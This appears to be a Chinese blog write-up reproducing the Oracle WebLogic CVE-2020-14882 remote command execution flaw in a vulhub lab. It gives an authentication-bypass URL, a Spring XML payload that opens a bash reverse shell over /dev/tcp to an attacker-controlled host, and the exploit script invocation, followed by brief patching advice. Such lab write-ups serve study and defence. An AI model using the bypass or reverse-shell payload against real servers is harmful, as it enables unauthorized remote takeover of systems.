CVE-2020-14882 Oracle WebLogic远程命令执行漏洞

目录

1.漏洞信息

2.环境搭建

3.漏洞复现

4.漏洞利用

5.修复建议

漏洞信息

漏洞名称

Weblogic CVE-2020-14882未授权远程命令执行漏洞

漏洞编号

CVE-2020-14882

危害等级

高危

CVSS评分

9.8

漏洞类型

中间件漏洞

漏洞厂商

Oracle

漏洞组件

Oracle Weblogic server

受影响版本

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0

漏洞概述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

环境搭建

2.1 环境概述

  1. Linux(kali)
  2. vulhub/weblogic/CVE-2020-14882

2.2搭建过程

1.Kali下载vulhub仓库

2.进入vulhub/weblogic/CVE-2020-14882目录下,使用命令docker-compose up –d启动环境

3.浏览器访问:你的ip:7001/console/login/LoginForm.jsp成功访问表示环境搭建成功

 漏洞复现

  1. 这里我们并不知道登录后台的用户名和密码,这里有一个绕过验证权限漏洞,我们构造了一个URL:http://yourip:7001/console/images/%252E%252E%252Fconsole.portal访问成功进入了后台, 但这里后台权限过低无法执行其他操作。

漏洞利用

1.有回显的利用

(1)使用已经撰写好的poc利用工具

(2)在攻击机上利用,这里成功回显到用户

2.外置xml文件无回显命令执行

1)新建一个xml文件,文件内容为

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
 <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/192.168.132.129/4444  0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

(2)开启服务端8000端口,使其能访问到poc.xml文件

(3)nc开启监听,端口为poc.xml中设置的端口

(4)攻击机中执行脚本

​
python3 CVE-2020-14882_ALL.py -u http://192.168.132.129:7001 -x http://192.168.132.129:8000/poc.xml

​

(5)监听端口可以查看已经成功获取到shell

 修复建议

  1. 及时下载官方补丁进行升级修复
  2. 禁止访问/console/console.portal

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值